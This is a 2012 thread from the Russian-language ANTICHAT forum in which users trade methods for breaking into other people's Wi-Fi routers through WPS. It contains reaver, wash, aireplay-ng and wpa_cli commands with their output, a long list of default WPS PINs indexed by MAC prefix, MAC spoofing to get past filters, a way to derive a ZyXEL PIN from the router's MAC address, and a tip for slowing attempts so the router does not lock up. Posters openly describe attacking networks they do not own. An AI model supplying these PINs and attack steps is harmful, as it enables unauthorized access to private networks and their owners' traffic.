ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.10.2012, 15:45
|
|
Member
Регистрация: 02.08.2012
Сообщений: 223
Провел на форуме:
77156
Репутация:
0
|
|
Из головы не выходит один вопрос, точнее 2, сам ответ найти не смог может, кто здесь подскажет или в какую сторону копать даст совет.
Итак:
1. "Раздолбил" благодаря неотключенному WPS некоторое количество точек доступа, к сожалению, большинство из них дали только пин-код. И все же от чего зависит: даст ли очередная БС пин и ключ или только пин, от версияи реализации ВПС или это всего навсего значит, что владелец данной БС, вообще, ключ не настраивал, а подключается исключительно по ВПС?
У какого какие мысли?
2. Подключаюсь к базе по пину (wpa_supplicant -Dwext -iwlan1 -C/var/run/wpa_supplicant -B
wpa_cli wps_reg - спасибо запостившему) в wpa_gui жму вкладку "edit" и там, о чудо, в прежде пустой строке "PSK" уже есть прописанная строка с ключом, которая, к сожалению, пока в виде "кружечков". Есть ли какая-либо возможность получить из нее ключ в читаемом виде?
Ну и раз пошла такая пьянка еще вопросик вдогонку. Подключаясь через wpa_gui к некоторым БС, не могу начать в них работу из-за того, что мой dhcp клиент не отсылает в сеть запросы на присвоение мне ip адреса (смотрю в wireshark), как его (dhcp- клиента) привести в чувство или где можно себе прописать ip? Раньше никогда такой проблемы не возникало ибо подключался через wicd, там все просто...
|
|
|
01.11.2012, 14:57
|
|
Познающий
Регистрация: 23.02.2012
Сообщений: 75
Провел на форуме:
20324
Репутация:
1
|
|
от дир615 23180253
выдал вместе с паролем
|
|
|
|
06.11.2012, 01:24
|
|
New Member
Регистрация: 12.10.2012
Сообщений: 12
Провел на форуме:
4588
Репутация:
0
|
|
Сообщение от moaddip
от дир615 23180253
выдал вместе с паролем
скажи пожалуйста , где можно найти пин коды для этих роутеров ????
20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
|
|
|
|
06.11.2012, 02:18
|
|
New Member
Регистрация: 12.10.2012
Сообщений: 12
Провел на форуме:
4588
Репутация:
0
|
|
Сообщение от zuriuslev
Можно ... в текущей версии 1.1.6 где-то так -
Код:
00:14:D1 26848185,1234XXXX
00:18:E7 15537782
00:19:15 12345670
00:19:70,00:21:29 64637129,22310298
00:24:17 31011193
00:26:44 7820XXXX,78202962
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:0C:F1 30447028
00:1A:2B 15624697,8847XXXX
00:1D:19,00:1D:7E 66026402
00:1D:73 88420707
00:4F:62 21207136
7C:4F:B5 75332662,72688656
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX
5C:33:8E 82848439,11765592
84:A8:E4 7996XX00
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482417
30:39:F2 1670XXXX,16538061,4329XXXX
50:67:F0 20064525
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F4:3E:61 58:6D:8F 47158382,69382161
94:44:52 93645348
08:86:3B 21250491
40:4A:03 11866428
64:68:0C 7996XXXX
88:25:2C 7654XXXX,03526859
04:C0:6F 0751XXXX
20:4E:7F 45197079
20:2B:C1 1957XXXX
F8:D1:11 4867XXXX
F4:C7:14,C4:3D:C7 5141XXXX
B0:48:7A 0055XXXX,54335677,1111XXXX
1C:7E:E5 6041XXXX,22609298,60418579
38:60:77,CC:96:77,C0:C1:C0 78985933,7898XXXX
C0:AC:54,C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
34:08:04 36022656,93395274
74:44:01 3555XXXX,00446747
BC:76:70 6326xxxx
00:1D:CE 85560130
58:98:35 53890894
DC:0B:1A 1653XXXX
38:72:C0 12345678
72:C0:6F 3863XXXX
6A:C7:14 3205XXXX
CO:3F:0E 8321XXXX
72:A8:E4 3357XXXX
62:C0:6F 3663XXXX
00:0B:3B 3814XXXX
00:24:01 97744757
E0:CB:4E 62987523
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX
База постоянно обновляется а есть для этих мас ???
20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530
20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530
00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP
00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ
|
|
|
|
12.11.2012, 23:22
|
|
Познающий
Регистрация: 24.02.2008
Сообщений: 65
Провел на форуме:
132279
Репутация:
23
|
|
zyxel
CC:5D:4E:4E:AE:AB
51565220
|
|
|
|
12.11.2012, 23:27
|
|
Member
Регистрация: 12.11.2012
Сообщений: 105
Провел на форуме:
33155
Репутация:
0
|
|
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one
и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.
Sending Authentication Request (Open System) [ACK]
Authentication Successfull
Sending association Request [ACK]
Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.
При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.
|
|
|
|
13.11.2012, 19:50
|
|
New Member
Регистрация: 04.03.2012
Сообщений: 2
Провел на форуме:
550
Репутация:
0
|
|
Сообщение от user_bad
zyxel
CC:5D:4E:4E:AE:AB
51565220
hex=4EAEAB
dec=5156523
Делай вывод и так большинство роутеров
|
|
|
|
13.11.2012, 21:36
|
|
Member
Регистрация: 12.11.2012
Сообщений: 105
Провел на форуме:
33155
Репутация:
0
|
|
Спасибо, но я не знаю что с этим делать, научите п.ж. Буду благодарен.
|
|
|
|
16.11.2012, 16:04
|
|
Новичок
Регистрация: 21.12.2007
Сообщений: 6
Провел на форуме:
56817
Репутация:
6
|
|
Сообщение от vedemur
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one
и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.
Sending Authentication Request (Open System) [ACK]
Authentication Successfull
Sending association Request [ACK]
Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.
При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.
Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.
У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.
|
|
|
|
16.11.2012, 17:32
|
|
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729
Репутация:
373
|
|
Сообщение от kachinski
Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.
У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.
Бывает , что точка доступа зависает от слишком частого запроса PIN . Пока не перезагрузят, АР не оклемается.
Можно попробовать увеличить задержку между попытками: reaver -i mon0 -b 00:01:02:03:04:05 -d 5 -S -v (можно выставит задержку от 5 до 15 сек.).
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
